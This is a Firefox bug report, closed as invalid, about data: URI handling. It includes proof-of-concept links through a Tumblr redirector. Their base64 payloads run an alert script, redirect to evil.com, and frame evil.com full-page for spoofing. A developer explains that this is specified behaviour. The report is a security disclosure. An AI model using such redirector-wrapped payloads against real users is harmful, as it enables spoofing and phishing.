Closed Bug 1351018 Opened 8 years ago Closed 8 years ago

Data Scheme URI + Automatic Download

Categories

(Firefox :: Untriaged, defect)

50 Branch
defect
Not set
normal

Tracking

()

RESOLVED INVALID

People

(Reporter: anasmahmood999, Unassigned)

Details

Attachments

(1 file)

Attached video mfd.avi
User Agent: Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0 Build ID: 20161208153507 Firefox for Android Steps to reproduce: The Data URI Scheme executes script using ‘text/html’, which makes the browser render it as a webpage. Hacker or Attacker can perform several types of malware attack through the advantage of Data URI Scheme which could result in UXSS , Open Redirection, Spoofing and others. http://t.umblr.com/redirect?z=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg%3D%3D&t=NWI3MzFjMDEzYmI5ZTQzMjJlNzhmOTNhYjJkMWQ1ZTYyMzVlYjAyNiw5OXlxQ2FuOQ%3D%3D&b=t%3A9YS5lw7WC4YK1xGhIj6ZxQ&p=https%3A%2F%2Fsuper-loveblog.tumblr.com%2Fpost%2F158706726327%2Fpoc-click-me-poc-click-me&m=1 http://t.umblr.com/redirect?z=data%3Atext%2Fhtml%3Bwww.WHAK.com%3Bcharset%3DUS-ASCII%3Bbase64%2CPHRpdGxlPkV2aWwuY29tPC90aXRsZT4gCjxzY3JpcHQ%2BCmZ1bmN0aW9uIFRpbWVyKGNhbGxiYWNrLCBkZWxheSkgewogICAgdmFyIHRpbWVySWQsIHN0YXJ0LCByZW1haW5pbmcgPSBkZWxheTsKCiAgICB0aGlzLnBhdXNlID0gZnVuY3Rpb24oKSB7CiAgICAgICAgd2luZG93LmNsZWFyVGltZW91dCh0aW1lcklkKTsKICAgICAgICByZW1haW5pbmcgLT0gbmV3IERhdGUoKSAtIHN0YXJ0OwogICAgfTsKCiAgICB0aGlzLnJlc3VtZSA9IGZ1bmN0aW9uKCkgewogICAgICAgIHN0YXJ0ID0gbmV3IERhdGUoKTsKICAgICAgICB3aW5kb3cuY2xlYXJUaW1lb3V0KHRpbWVySWQpOwogICAgICAgIHRpbWVySWQgPSB3aW5kb3cuc2V0VGltZW91dChjYWxsYmFjaywgcmVtYWluaW5nKTsKICAgIH07CgogICAgdGhpcy5yZXN1bWUoKTsKfQoKdmFyIHRpbWVyID0gbmV3IFRpbWVyKGZ1bmN0aW9uKCkgewogICBsb2NhdGlvbi5yZXBsYWNlKCJodHRwOi8vd3d3LmV2aWwuY29tIik7Cn0sIDUwMDApOwoKCnRpbWVyLnBhdXNlKCk7Ci8vIERvIHNvbWUgc3R1ZmYuLi4KdGltZXIucmVzdW1lKCk7Cjwvc2NyaXB0PjxpZnJhbWUgIHN0eWxlPSJtYXJnaW46MDtib3JkZXI6bm9uZTsiIGhlaWdodD0xMDAlIHdpZHRoPTEwMCUgc3JjPSJodHRwOi8vd3d3LmV2aWwuY29tIjs8L2lmcmFtZT4%3D&t=ZGEwMmJiY2E4ZTM2MzUyNTIwZjEwMjU5MDgxNDA4OTZlMjBiZTkwNSxLdlV5WUlyeQ%3D%3D&b=t%3A9YS5lw7WC4YK1xGhIj6ZxQ&p=https%3A%2F%2Fsuper-loveblog.tumblr.com%2Fpost%2F158777600262%2Fpoc-click-me-poc-click-me&m=1 http://t.umblr.com/redirect?z=data%3Atext%2Fhtml%3Bwww.WHAK.com%3Bcharset%3DUS-ASCII%3Bbase64%2CPHRpdGxlPkV2aWwuY29tPC90aXRsZT4gCjxzY3JpcHQ%2BCmZ1bmN0aW9uIFRpbWVyKGNhbGxiYWNrLCBkZWxheSkgewogICAgdmFyIHRpbWVySWQsIHN0YXJ0LCByZW1haW5pbmcgPSBkZWxheTsKCiAgICB0aGlzLnBhdXNlID0gZnVuY3Rpb24oKSB7CiAgICAgICAgd2luZG93LmNsZWFyVGltZW91dCh0aW1lcklkKTsKICAgICAgICByZW1haW5pbmcgLT0gbmV3IERhdGUoKSAtIHN0YXJ0OwogICAgfTsKCiAgICB0aGlzLnJlc3VtZSA9IGZ1bmN0aW9uKCkgewogICAgICAgIHN0YXJ0ID0gbmV3IERhdGUoKTsKICAgICAgICB3aW5kb3cuY2xlYXJUaW1lb3V0KHRpbWVySWQpOwogICAgICAgIHRpbWVySWQgPSB3aW5kb3cuc2V0VGltZW91dChjYWxsYmFjaywgcmVtYWluaW5nKTsKICAgIH07CgogICAgdGhpcy5yZXN1bWUoKTsKfQoKdmFyIHRpbWVyID0gbmV3IFRpbWVyKGZ1bmN0aW9uKCkgewogICBhbGVydCgyKTsKfSwgNTAwMCk7CgoKdGltZXIucGF1c2UoKTsKLy8gRG8gc29tZSBzdHVmZi4uLgp0aW1lci5yZXN1bWUoKTsKPC9zY3JpcHQ%2BPGlmcmFtZSAgc3R5bGU9Im1hcmdpbjowO2JvcmRlcjpub25lOyIgaGVpZ2h0PTEwMCUgd2lkdGg9MTAwJSBzcmM9Imh0dHA6Ly93d3cuZXZpbC5jb20iOzwvaWZyYW1lPg%3D%3D&t=MjkwNjcxMTNlMGZmMWFiMDhjMDhkNThmZjhmZjBlOGJiMzM1Njk2ZCxLdlV5WUlyeQ%3D%3D&b=t%3A9YS5lw7WC4YK1xGhIj6ZxQ&p=https%3A%2F%2Fsuper-loveblog.tumblr.com%2Fpost%2F158777600262%2Fpoc-click-me-poc-click-me&m=1 We can do everything with data URI OK... Now today when I playing with data URIs and type the uri in search bar of browser "daTa:text/html%3Bbase64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%23http://" browser download it as a file . This occurs due to (;) url encode (%3B) after html . http://t.umblr.com/redirect?z=daTa%3Atext%2Fhtml%253Bbase64%2CPHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K%2523http%3A%2F%2F&t=OWMxNDQ2NmQ0NTM0M2FmZjU1NjEyNjgyMDk4NmJhM2JiMDk3MmYyOCxrTGdCU2ZnRQ%3D%3D&b=t%3A9YS5lw7WC4YK1xGhIj6ZxQ&p=https%3A%2F%2Fsuper-loveblog.tumblr.com%2Fpost%2F158898456792%2Fclick&m=1 Through this attacker can take advantage and malicious file downloads in victim PC. This vulnerability exist in all version of Firefox 52 latest. I also check this bug on other browsers but this only exist in Mozilla Firefox . Actual results: URI Download Expected results: URI should Not download
This appears to be working as specified. We are exploring changing the URL inheritance of data: URIs in other bugs. In your second issue there are several legitimate ways to trigger a download; this is not a danger. You could, for example, use data:application/octet-stream;base64,blablah. In your case the %3B makes us see "html%3bbase64" run together. Since we don't have a handler for that content-type we offer to download it in case the user has a local program that can handle it. A web page could also use the "download" attribute on a link to force a download for whatever type of URL it is.
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → INVALID
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: